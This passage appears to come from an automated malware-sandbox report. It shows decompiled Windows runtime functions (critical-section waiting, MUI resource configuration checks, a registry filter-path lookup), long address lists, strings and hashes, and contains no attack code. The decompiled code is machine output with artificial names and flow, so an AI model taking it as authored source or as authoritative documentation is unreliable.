									__eflags = _t241 - 0x34263390;
									if(_t241 != 0x34263390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											L3420AB5E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								E341FEF10();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}

0x3419f4d0
0x3419f4d0
0x3419f4d8
0x3419f4e5
0x3419f4ec
0x3419f4f5
0x3419f4f7
0x3419f4fb
0x3419f4ff
0x3419f504
0x3419f508
0x3419f516
0x341dff46
0x341dff4b
0x341dff4b
0x3419f523
0x341dff5a
0x341dff5f
0x341dff61
0x341dff61
0x3419f530
0x341dff6b
0x3419f536
0x3419f536
0x3419f536
0x3419f542
0x3419f545
0x3419f722
0x3419f725
0x3419f72c
0x3419f730
0x341dff78
0x341dff7a
0x341dff7c
0x341dff7e
0x341dff87
0x341dff88
0x341dff8d
0x341dff8f
0x341dff9d
0x341dff91
0x341dff91
0x341dff94
0x341dff94
0x341dff8f
0x3419f738
0x3419f73c
0x3419f73e
0x341dffa6
0x341dffaa
0x341dffad
0x341dffb3
0x341dffb4
0x341dffb4
0x341dffad
0x3419f73e
0x3419f54b
0x3419f550
0x3419f749
0x3419f74c
0x3419f753
0x3419f759
0x3419f75b
0x3419f760
0x3419f760
0x3419f753
0x3419f556
0x3419f561
0x3419f563
0x3419f563
0x3419f566
0x3419f568
0x00000000
0x3419f570
0x3419f570
0x3419f577
0x341dffc7
0x3419f57d
0x3419f57d
0x3419f57d
0x3419f585
0x341dffd1
0x341dffd7
0x341dffde
0x341dffe9
0x341dfff0
0x341dfffd
0x341e0004
0x341e000b
0x341e0018
0x341e001b
0x341e001d
0x341e0034
0x341e0034
0x341e001f
0x341e001f
0x341e0022
0x00000000
0x341e0024
0x341e002d
0x341e002d
0x341e0022
0x341e003c
0x341e0040
0x341e0041
0x341e0043
0x341e0048
0x341e0049
0x341e0049
0x00000000
0x3419f682
0x3419f684
0x341e01e2
0x341e01e7
0x341e01e8
0x341e01eb
0x3419f825
0x3419f82d
0x3419f832
0x341e01f1
0x341e01f4
0x341e01f6
0x341e01ff
0x341e0203
0x341e0205
0x00000000
0x341e020b
0x341e020b
0x3419f807
0x00000000
0x3419f809
0x3419f817
0x3419f817
0x3419f807
0x341e0205
0x3419f822
0x3419f68a
0x3419f68f
0x341e014a
0x341e015a
0x341e015d
0x341e015f
0x341e0176
0x341e0176
0x341e0161
0x341e0161
0x341e0164
0x00000000
0x341e0166
0x341e016f
0x341e016f
0x341e0164
0x341e017b
0x341e017e
0x341e0184
0x341e018a
0x341e0191
0x341e019d
0x341e01a0
0x341e01a2
0x341e01b9
0x341e01b9
0x341e01a4
0x341e01a4
0x341e01a7
0x00000000
0x341e01a9
0x341e01b2
0x341e01b2
0x341e01a7
0x341e01be
0x341e01c1
0x341e01d7
0x341e01d7
0x341e01c1
0x341e0191
0x341e017e
0x3419f69c
0x3419f69d
0x3419f69e
0x3419f6a9
0x3419f6a9
0x3419f684
0x3419f58b
0x3419f58e
0x341e0093
0x341e0097
0x341e0099
0x341e009a
0x3419f594
0x3419f59b
0x3419f59e
0x3419f5a2
0x3419f5a2
0x3419f5a9
0x3419f5ad
0x3419f5b5
0x3419f5bd
0x3419f5c5
0x3419f5d0
0x3419f5d9
0x3419f5dd
0x3419f5e6
0x3419f5e9
0x3419f5ed
0x3419f5f3
0x3419f600
0x3419f607
0x3419f60a
0x3419f60c
0x3419f612
0x3419f6b3
0x3419f6bb
0x3419f618
0x3419f61c
0x3419f61c
0x3419f620
0x3419f622
0x3419f624
0x3419f62a
0x00000000
0x00000000
0x341e0053
0x341e0053
0x3419f630
0x3419f636
0x3419f63c
0x3419f6c3
0x3419f6c7
0x3419f6d0
0x3419f6d2
0x3419f6d5
0x3419f6dc
0x3419f6e0
0x00000000
0x00000000
0x3419f6e2
0x3419f6e2
0x3419f6e2
0x3419f6e4
0x3419f6e7
0x3419f6ea
0x3419f6ea
0x3419f6f0
0x3419f6f7
0x3419f6f9
0x3419f6fc
0x3419f767
0x3419f6fe
0x3419f700
0x3419f705
0x3419f705
0x3419f708
0x3419f70a
0x3419f70e
0x3419f710
0x3419f770
0x3419f6d2
0x3419f6d5
0x3419f6dc
0x3419f6e0
0x00000000
0x00000000
0x00000000
0x3419f6e0
0x3419f712
0x3419f717
0x341e005a
0x341e005a
0x341e005d
0x341e0061
0x341e0067
0x341e0067
0x341e006f
0x341e0072
0x341e0074
0x341e0076
0x341e007c
0x341e007f
0x341e007f
0x341e0084
0x341e0086
0x341e008a
0x341e008a
0x341e008e
0x341e0061
0x00000000
0x3419f717
0x3419f6d0
0x3419f642
0x3419f644
0x3419f648
0x3419f650
0x3419f6aa
0x3419f6af
0x3419f652
0x3419f658
0x3419f658
0x3419f662
0x341e00a4
0x341e00a4
0x341e00ac
0x341e00b3
0x341e00c0
0x341e00c5
0x341e00d0
0x341e00d5
0x341e00d7
0x341e00da
0x341e00dd
0x341e00e4
0x341e00e4
0x341e00df
0x341e00df
0x341e00df
0x341e00e6
0x341e00e7
0x341e00e8
0x341e00eb
0x341e00fa
0x341e00ff
0x341e0102
0x341e0103
0x341e0105
0x341e010e
0x341e0110
0x341e0113
0x341e0115
0x341e011b
0x341e011d
0x341e0121
0x341e0123
0x341e0123
0x341e0121
0x341e011b
0x341e0128
0x341e012d
0x341e012f
0x341e0131
0x341e0135
0x341e013a
0x341e013e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x3419f668
0x3419f668
0x3419f66a
0x3419f66e
0x3419f5a2
0x3419f677
0x3419f67c
0x00000000
0x00000000
0x00000000
0x3419f67c

Strings

RTL: Re-Waiting, xrefs: 341E0128
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 341E00F1
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 341E00C7

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: bc63dd8ba494af69ea644c136998829b34ea8d39c8c72735f5b5fca1f3925f0c
Instruction ID: 95ab11f004c5098a76b7c1003a5564eac057b38fcda6503287b50cea7d9056ed
Opcode Fuzzy Hash: bc63dd8ba494af69ea644c136998829b34ea8d39c8c72735f5b5fca1f3925f0c
Instruction Fuzzy Hash: 5CE1BE74608B41EFE711CF28C8C0B5ABBE1BB45364F100A9DF5A58B2E0DB75D985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 3417B5E0 Relevance: 4.1, Strings: 3, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E3417B5E0(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				short _t100;
				short _t101;
				signed int* _t107;
				signed char* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed char* _t114;
				signed int _t115;
				signed int _t117;
				signed int _t125;
				void* _t129;
				void* _t131;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t150;
				short _t158;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				void* _t209;

				_push(0x48);
				_push(0x3424bfb0);
				E341C7C40(__ebx, __edi, __esi);
				_t185 =  *(_t209 + 8);
				 *(_t209 - 0x34) = _t185;
				 *(_t209 - 0x40) =  *(_t209 + 0x10);
				 *((intOrPtr*)(_t209 - 0x28)) = L"MUI";
				 *((intOrPtr*)(_t209 - 0x24)) = 1;
				 *((intOrPtr*)(_t209 - 0x20)) = 0;
				 *(_t209 - 0x38) =  *(_t209 + 0xc);
				 *(_t209 - 0x30) = 0;
				_t158 = 0x2e;
				 *((short*)(_t209 - 0x50)) = _t158;
				_t100 = 0x30;
				 *((short*)(_t209 - 0x4e)) = _t100;
				 *(_t209 - 0x4c) = L"LdrResGetRCConfig Enter";
				_t101 = 0x2c;
				 *((short*)(_t209 - 0x58)) = _t101;
				 *((short*)(_t209 - 0x56)) = _t158;
				 *(_t209 - 0x54) = L"LdrResGetRCConfig Exit";
				 *(_t209 - 0x3c) =  *(_t209 + 0x14) & 0x00002000;
				asm("sbb esi, esi");
				_t205 = (__esi & 0x00001000) + 0x1000;
				_t107 =  *( *[fs:0x30] + 0x50);
				if(_t107 != 0) {
					__eflags =  *_t107;
					if( *_t107 == 0) {
						goto L1;
					}
					_t108 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t108 & 0x00000001) != 0) {
						_t109 = E34183C40();
						_t198 = 0x7ffe0384;
						__eflags = _t109;
						if(_t109 == 0) {
							_t110 = 0x7ffe0384;
						} else {
							_t110 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E341FFC01(_t209 - 0x50,  *_t110 & 0x000000ff);
						_t185 =  *(_t209 - 0x34);
					} else {
						_t198 = 0x7ffe0384;
					}
					if(_t185 == 0) {
						 *(_t209 - 0x2c) = 0xc000000d;
						goto L8;
					} else {
						if( *((intOrPtr*)(_t209 + 0x18)) == 0) {
							L17:
							__eflags =  *(_t209 + 0xc);
							if( *(_t209 + 0xc) == 0) {
								__eflags =  *(_t209 - 0x3c);
								if(__eflags != 0) {
									goto L18;
								}
								_push(0);
								_push( *(_t209 + 0x14));
								_push(_t209 - 0x38);
								_push(_t185);
								_t117 = L3417AB70(0, _t198, _t205, __eflags);
								__eflags = _t117;
								if(_t117 >= 0) {
									goto L18;
								}
								L12:
								 *[fs:0x0] =  *((intOrPtr*)(_t209 - 0x10));
								return _t117;
							}
							L18:
							_t201 = E3417AD00( *(_t209 - 0x34),  *(_t209 - 0x38), _t205 | 0x00200030, _t209 - 0x28, 3, _t209 - 0x30, _t209 - 0x44, 0, 0);
							 *(_t209 - 0x2c) = _t201;
							__eflags = _t201;
							if(_t201 >= 0) {
								 *((intOrPtr*)(_t209 - 4)) = 0;
								_t208 =  *(_t209 - 0x30);
								__eflags =  *(_t209 - 0x3c);
								if( *(_t209 - 0x3c) != 0) {
									L56:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									_t125 =  *(_t209 - 0x40);
									__eflags = _t125;
									if(_t125 != 0) {
										 *_t125 = _t208;
									}
									_t202 = 0;
									 *(_t209 - 0x2c) = 0;
									L23:
									__eflags =  *((char*)(_t209 + 0x18));
									if( *((char*)(_t209 + 0x18)) != 0) {
										__eflags = _t208;
										if(_t208 == 0) {
											_t208 = _t208 | 0xffffffff;
											__eflags = _t208;
										}
										_push(0);
										_push(_t202);
										_push(2);
										_push(0);
										_push(_t208);
										_push(0);
										__eflags = 0;
										E341793A6(0,  *(_t209 - 0x34), 0, _t202, _t208, 0);
									}
									_t198 = 0x7ffe0384;
									L8:
									_t113 =  *( *[fs:0x30] + 0x50);
									if(_t113 != 0) {
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L9;
										}
										_t114 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										L10:
										if(( *_t114 & 0x00000001) != 0) {
											_t115 = E34183C40();
											__eflags = _t115;
											if(_t115 != 0) {
												_t198 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											}
											E341FFC01(_t209 - 0x58,  *_t198 & 0x000000ff);
										}
										_t117 =  *(_t209 - 0x2c);
										goto L12;
									}
									L9:
									_t114 = 0x7ffe0385;
									goto L10;
								}
								_t190 =  *((intOrPtr*)(_t208 + 4));
								__eflags = _t190 + _t208 - ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38);
								if(_t190 + _t208 > ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38)) {
									_t202 = 0xc000007b;
									 *(_t209 - 0x2c) = 0xc000007b;
									L70:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									L21:
									__eflags = _t202;
									if(_t202 >= 0) {
										_t208 =  *(_t209 - 0x30);
									} else {
										_t208 = 0;
										 *(_t209 - 0x30) = 0;
									}
									goto L23;
								}
								_t202 = 0xc00b0003;
								 *(_t209 - 0x2c) = 0xc00b0003;
								_t168 =  *((intOrPtr*)(_t208 + 0x44));
								_t129 =  *((intOrPtr*)(_t208 + 0x48)) + _t168;
								__eflags = _t129 - _t190;
								if(_t129 > _t190) {
									goto L70;
								}
								__eflags = _t129 - _t168;
								if(_t129 < _t168) {
									goto L70;
								}
								_t169 =  *((intOrPtr*)(_t208 + 0x4c));
								_t131 =  *((intOrPtr*)(_t208 + 0x50)) + _t169;
								__eflags = _t131 - _t190;
								if(_t131 > _t190) {
									goto L70;
								}
								__eflags = _t131 - _t169;
								if(_t131 < _t169) {
									goto L70;
								}
								_t170 =  *((intOrPtr*)(_t208 + 0x54));
								_t133 =  *((intOrPtr*)(_t208 + 0x58)) + _t170;
								__eflags = _t133 - _t190;
								if(_t133 > _t190) {
									goto L70;
								}
								__eflags = _t133 - _t170;
								if(_t133 < _t170) {
									goto L70;
								}
								_t171 =  *((intOrPtr*)(_t208 + 0x5c));
								_t135 =  *((intOrPtr*)(_t208 + 0x60)) + _t171;
								__eflags = _t135 - _t190;
								if(_t135 > _t190) {
									goto L70;
								}
								__eflags = _t135 - _t171;
								if(_t135 < _t171) {
									goto L70;
								}
								_t172 =  *((intOrPtr*)(_t208 + 0x64));
								_t137 =  *((intOrPtr*)(_t208 + 0x68)) + _t172;
								__eflags = _t137 - _t190;
								if(_t137 > _t190) {
									goto L70;
								}
								__eflags = _t137 - _t172;
								if(_t137 < _t172) {
									goto L70;
								}
								_t173 =  *((intOrPtr*)(_t208 + 0x6c));
								_t139 =  *((intOrPtr*)(_t208 + 0x70)) + _t173;
								__eflags = _t139 - _t190;
								if(_t139 > _t190) {
									goto L70;
								}
								__eflags = _t139 - _t173;
								if(_t139 < _t173) {
									goto L70;
								}
								_t174 =  *((intOrPtr*)(_t208 + 0x74));
								_t141 =  *((intOrPtr*)(_t208 + 0x78)) + _t174;
								__eflags = _t141 - _t190;
								if(_t141 > _t190) {
									goto L70;
								}
								__eflags = _t141 - _t174;
								if(_t141 < _t174) {
									goto L70;
								}
								_t175 =  *((intOrPtr*)(_t208 + 0x7c));
								_t143 =  *((intOrPtr*)(_t208 + 0x80)) + _t175;
								__eflags = _t143 - _t190;
								if(_t143 > _t190) {
									goto L70;
								}
								__eflags = _t143 - _t175;
								if(_t143 < _t175) {
									goto L70;
								}
								__eflags =  *_t208 - 0xfecdfecd;
								if( *_t208 != 0xfecdfecd) {
									goto L70;
								}
								__eflags = _t190 -  *((intOrPtr*)(_t209 - 0x44));
								if(_t190 !=  *((intOrPtr*)(_t209 - 0x44))) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t208 + 8)) - 0x10000;
								if( *((intOrPtr*)(_t208 + 8)) != 0x10000) {
									goto L70;
								}
								_t176 =  *(_t208 + 0xc);
								__eflags =  *(_t208 + 0xc);
								if( *(_t208 + 0xc) != 0) {
									_t191 = 7;
									_t144 = L341AB95A(_t176, _t191);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L70;
									}
								}
								_t192 = 3;
								_t145 = L341AB95A( *(_t208 + 0x10) & 0xffffffcf, _t192);
								__eflags = _t145;
								if(_t145 == 0) {
									goto L70;
								}
								_t193 = 0x30;
								_t146 = L341AB95A( *(_t208 + 0x10) & 0xfffffffc, _t193);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L70;
								}
								__eflags =  *(_t208 + 0x10) & 0x00000001;
								if(( *(_t208 + 0x10) & 0x00000001) == 0) {
									L55:
									 *(_t209 - 0x2c) = 0;
									goto L56;
								}
								_t194 = 3;
								_t147 = L341AB95A( *((intOrPtr*)(_t208 + 0x18)), _t194);
								__eflags = _t147;
								if(_t147 == 0) {
									goto L70;
								}
								_t182 =  *(_t208 + 0x14);
								__eflags =  *(_t208 + 0x14);
								if( *(_t208 + 0x14) != 0) {
									_t148 = L341AB95A(_t182, 0x100);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L70;
									}
								}
								goto L55;
							}
							__eflags = _t201 - 0xc000007b;
							if(_t201 != 0xc000007b) {
								_t202 = 0xc000008a;
								 *(_t209 - 0x2c) = 0xc000008a;
							}
							goto L21;
						}
						_t150 = E3417D530( *(_t209 - 0x34), 0, 0, 8);
						 *(_t209 - 0x30) = _t150;
						if(_t150 != 0xffffffff) {
							__eflags = _t150;
							if(_t150 == 0) {
								_t185 =  *(_t209 - 0x34);
								goto L17;
							} else {
								 *(_t209 - 0x2c) = 0;
								_t184 =  *(_t209 - 0x40);
								__eflags = _t184;
								if(_t184 != 0) {
									 *_t184 = _t150;
								}
								goto L8;
							}
						} else {
							 *(_t209 - 0x2c) = 0xc000008a;
							goto L8;
						}
					}
				}
				L1:
				_t108 = 0x7ffe0385;
				goto L2;
			}

0x3417b5e0
0x3417b5e2
0x3417b5e7
0x3417b5ec
0x3417b5ef
0x3417b5f5
0x3417b5f8
0x3417b5ff
0x3417b608
0x3417b60e
0x3417b611
0x3417b616
0x3417b617
0x3417b61d
0x3417b61e
0x3417b622
0x3417b62b
0x3417b62c
0x3417b630
0x3417b634
0x3417b643
0x3417b648
0x3417b651
0x3417b659
0x3417b65e
0x341d363b
0x341d363d
0x00000000
0x00000000
0x341d364c
0x3417b669
0x3417b66c
0x341d3656
0x341d365b
0x341d3660
0x341d3662
0x341d3674
0x341d3664
0x341d366d
0x341d366d
0x341d367c
0x341d3681
0x3417b672
0x3417b672
0x3417b672
0x3417b679
0x341d3689
0x00000000
0x3417b67f
0x3417b682
0x3417b6e9
0x3417b6e9
0x3417b6ec
0x3417b8ee
0x3417b8f1
0x00000000
0x00000000
0x3417b8f7
0x3417b8f8
0x3417b8fe
0x3417b8ff
0x3417b900
0x3417b905
0x3417b907
0x00000000
0x00000000
0x3417b6c2
0x3417b6c5
0x3417b6d1
0x3417b6d1
0x3417b6f2
0x3417b714
0x3417b716
0x3417b719
0x3417b71b
0x3417b762
0x3417b765
0x3417b768
0x3417b76c
0x3417b8d4
0x3417b8d4
0x3417b8db
0x3417b8de
0x3417b8e0
0x3417b8e2
0x3417b8e2
0x3417b8e4
0x3417b8e6
0x3417b73a
0x3417b73a
0x3417b73e
0x3417b740
0x3417b742
0x3417b744
0x3417b744
0x3417b744
0x3417b747
0x3417b748
0x3417b749
0x3417b74b
0x3417b74c
0x3417b74d
0x3417b74e
0x3417b753
0x3417b753
0x3417b758
0x3417b6a0
0x3417b6a6
0x3417b6ab
0x341d36f3
0x341d36f6
0x00000000
0x00000000
0x341d3705
0x3417b6b6
0x3417b6b9
0x341d370f
0x341d3714
0x341d3716
0x341d3721
0x341d3721
0x341d3721
0x341d372d
0x341d372d
0x3417b6bf
0x00000000
0x3417b6bf
0x3417b6b1
0x3417b6b1
0x00000000
0x3417b6b1
0x3417b772
0x3417b781
0x3417b783
0x341d3695
0x341d369a
0x341d36ad
0x341d36ad
0x3417b72d
0x3417b72d
0x3417b72f
0x341d36eb
0x3417b735
0x3417b735
0x3417b737
0x3417b737
0x00000000
0x3417b72f
0x3417b789
0x3417b78e
0x3417b791
0x3417b797
0x3417b799
0x3417b79b
0x00000000
0x00000000
0x3417b7a1
0x3417b7a3
0x00000000
0x00000000
0x3417b7a9
0x3417b7af
0x3417b7b1
0x3417b7b3
0x00000000
0x00000000
0x3417b7b9
0x3417b7bb
0x00000000
0x00000000
0x3417b7c1
0x3417b7c7
0x3417b7c9
0x3417b7cb
0x00000000
0x00000000
0x3417b7d1
0x3417b7d3
0x00000000
0x00000000
0x3417b7d9
0x3417b7df
0x3417b7e1
0x3417b7e3
0x00000000
0x00000000
0x3417b7e9
0x3417b7eb
0x00000000
0x00000000
0x3417b7f1
0x3417b7f7
0x3417b7f9
0x3417b7fb
0x00000000
0x00000000
0x3417b801
0x3417b803
0x00000000
0x00000000
0x3417b809
0x3417b80f
0x3417b811
0x3417b813
0x00000000
0x00000000
0x3417b819
0x3417b81b
0x00000000
0x00000000
0x3417b821
0x3417b827
0x3417b829
0x3417b82b
0x00000000
0x00000000
0x3417b831
0x3417b833
0x00000000
0x00000000
0x3417b839
0x3417b842
0x3417b844
0x3417b846
0x00000000
0x00000000
0x3417b84c
0x3417b84e
0x00000000
0x00000000
0x3417b854
0x3417b85a
0x00000000
0x00000000
0x3417b860
0x3417b863
0x00000000
0x00000000
0x3417b869
0x3417b870
0x00000000
0x00000000
0x3417b876
0x3417b879
0x3417b87b
0x341d36bb
0x341d36bc
0x341d36c1
0x341d36c3
0x00000000
0x00000000
0x341d36c5
0x3417b889
0x3417b88a
0x3417b88f
0x3417b891
0x00000000
0x00000000
0x3417b89f
0x3417b8a0
0x3417b8a5
0x3417b8a7
0x00000000
0x00000000
0x3417b8ad
0x3417b8b1
0x3417b8d1
0x3417b8d1
0x00000000
0x3417b8d1
0x3417b8b5
0x3417b8b9
0x3417b8be
0x3417b8c0
0x00000000
0x00000000
0x3417b8c6
0x3417b8c9
0x3417b8cb
0x341d36cf
0x341d36d4
0x341d36d6
0x00000000
0x00000000
0x341d36d8
0x00000000
0x3417b8cb
0x3417b71d
0x3417b723
0x3417b725
0x3417b72a
0x3417b72a
0x00000000
0x3417b723
0x3417b68c
0x3417b691
0x3417b697
0x3417b6d4
0x3417b6d6
0x3417b6e6
0x00000000
0x3417b6d8
0x3417b6d8
0x3417b6db
0x3417b6de
0x3417b6e0
0x3417b6e2
0x3417b6e2
0x00000000
0x3417b6e0
0x3417b699
0x3417b699
0x00000000
0x3417b699
0x3417b697
0x3417b679
0x3417b664
0x3417b664
0x00000000

Strings

LdrResGetRCConfig Exit, xrefs: 3417B634
MUI, xrefs: 3417B5F8, 3417B707
LdrResGetRCConfig Enter, xrefs: 3417B622

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: fcf371f220218981d506b391a9604dcf63a74b2b5e458b09a86e1e675a8c1e64
Instruction ID: 3f2415050362dc69e77d059501ccac9778b71550c1e86777cd4a7da5792738b1
Opcode Fuzzy Hash: fcf371f220218981d506b391a9604dcf63a74b2b5e458b09a86e1e675a8c1e64
Instruction Fuzzy Hash: 21B19AB5A11B488FEB14CF65C8D0BAEBBB6AF45798F14456DE911EB380D730EA41CB00

Uniqueness

Uniqueness Score: -1.00%

Function 3416A147 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E3416A147(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				char _t96;
				char* _t101;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t125;
				short _t129;
				signed int* _t140;
				intOrPtr _t141;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t157;

				_t152 = __edx;
				_v12 =  *0x3426b370 ^ _t157;
				_v564 = _v564 & 0x00000000;
				_t154 = _a4;
				_t140 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t153 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E34191D10( &_v580, L"UseFilter") < 0) {
					L4:
					return L341B4B50(_t90, _t140, _v12 ^ _t157, _t152, _t153, _t154);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_t94 = 2;
				_push(_t94);
				_push( &_v580);
				_push( *_t140);
				_t90 = L341B2B00();
				if(_t90 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t90 = 0;
					} else {
						_t96 =  *_t154;
						_t154 =  *(_t154 + 4);
						_v588 = _t96;
						_v584 = _t154;
						if(E34191D10( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E341A40F0( &_v560,  &_v580,  &_v588, ?str?) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t154 + 8;
						}
						_t101 =  &_v560;
						_t146 = 0;
						_v596 = _t101;
						_v600 = 0;
						do {
							_t152 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t101);
							_push(0);
							_push(_t146);
							_push( *_t140);
							_t154 = E341B2CD0();
							if(_t154 < 0) {
								goto L37;
							}
							_t148 = _v596;
							_v580 =  *((intOrPtr*)(_t148 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t148 + 0xc));
							_v576 = _t148 + 0x10;
							_v636 =  *_t140;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t154 = L341B2AB0();
							if(_t154 < 0) {
								goto L37;
							}
							_t154 = E34191D10( &_v580, L"FilterFullPath");
							if(_t154 < 0) {
								L36:
								_push(_v564);
								E341B2A80();
								goto L37;
							}
							_t141 = _v592;
							_t120 = _v568;
							do {
								_push( &_v572);
								_push(_t120);
								_push(_t141);
								_t121 = 2;
								_push(_t121);
								_push( &_v580);
								_push(_v564);
								_t155 = L341B2B00();
								if(_t155 == 0x80000005 || _t155 == 0xc0000023) {
									if(_t153 != 0) {
										L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
									}
									_t150 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t125 =  *0x34265d78; // 0x0
										_t153 = E34185D90(_t150, _t150, _t125 + 0x180000, _v572);
										if(_t153 == 0) {
											goto L25;
										}
										_t120 = _v572;
										_t141 = _t153;
										_v596 = _t153;
										_v568 = _t120;
										goto L27;
									} else {
										_t153 = 0;
										L25:
										_t154 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t120 = _v568;
								}
								L27:
							} while (_t154 == 0x80000005 || _t154 == 0xc0000023);
							_v592 = _t141;
							_t140 = _v608;
							if(_t154 >= 0) {
								_t151 = _v592;
								if( *((intOrPtr*)(_t151 + 4)) == 1 &&  *((intOrPtr*)(_t151 + 8)) <= 0xfffe) {
									_t152 = 2;
									_t129 =  *((intOrPtr*)(_t151 + 8)) - _t152;
									_v616 = _t129;
									_v614 = _t129;
									_v612 = _t151 + 0xc;
									if(E341904C0( &_v588,  &_v616, ?str?) == 0) {
										break;
									}
								}
								goto L36;
							}
							_push(_v564);
							E341B2A80();
							_t65 = _t154 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t154 = _t154 &  ~_t65;
							L37:
							_t101 = _v596;
							_t146 = _v600 + 1;
							_v600 = _t146;
						} while (_t154 >= 0);
						if(_t153 != 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
						}
						if(_t154 >= 0) {
							_push( *_t140);
							E341B2A80();
							 *_t140 = _v564;
						}
						_t86 = _t154 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t90 =  ~_t86 & _t154;
					}
					goto L4;
				}
				if(_t90 != 0xc0000034) {
					if(_t90 == 0xc0000023) {
						goto L3;
					}
					if(_t90 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

0x3416a147
0x3416a159
0x3416a15c
0x3416a16b
0x3416a16e
0x3416a17c
0x3416a183
0x3416a189
0x3416a18b
0x3416a195
0x3416a1a2
0x3416a1de
0x3416a1ec
0x3416a1ec
0x3416a1aa
0x3416a1ab
0x3416a1b6
0x3416a1b9
0x3416a1ba
0x3416a1c1
0x3416a1c2
0x3416a1c4
0x3416a1cb
0x341cbf43
0x3416a1dc
0x3416a1dc
0x341cbf62
0x341cbf62
0x341cbf64
0x341cbf67
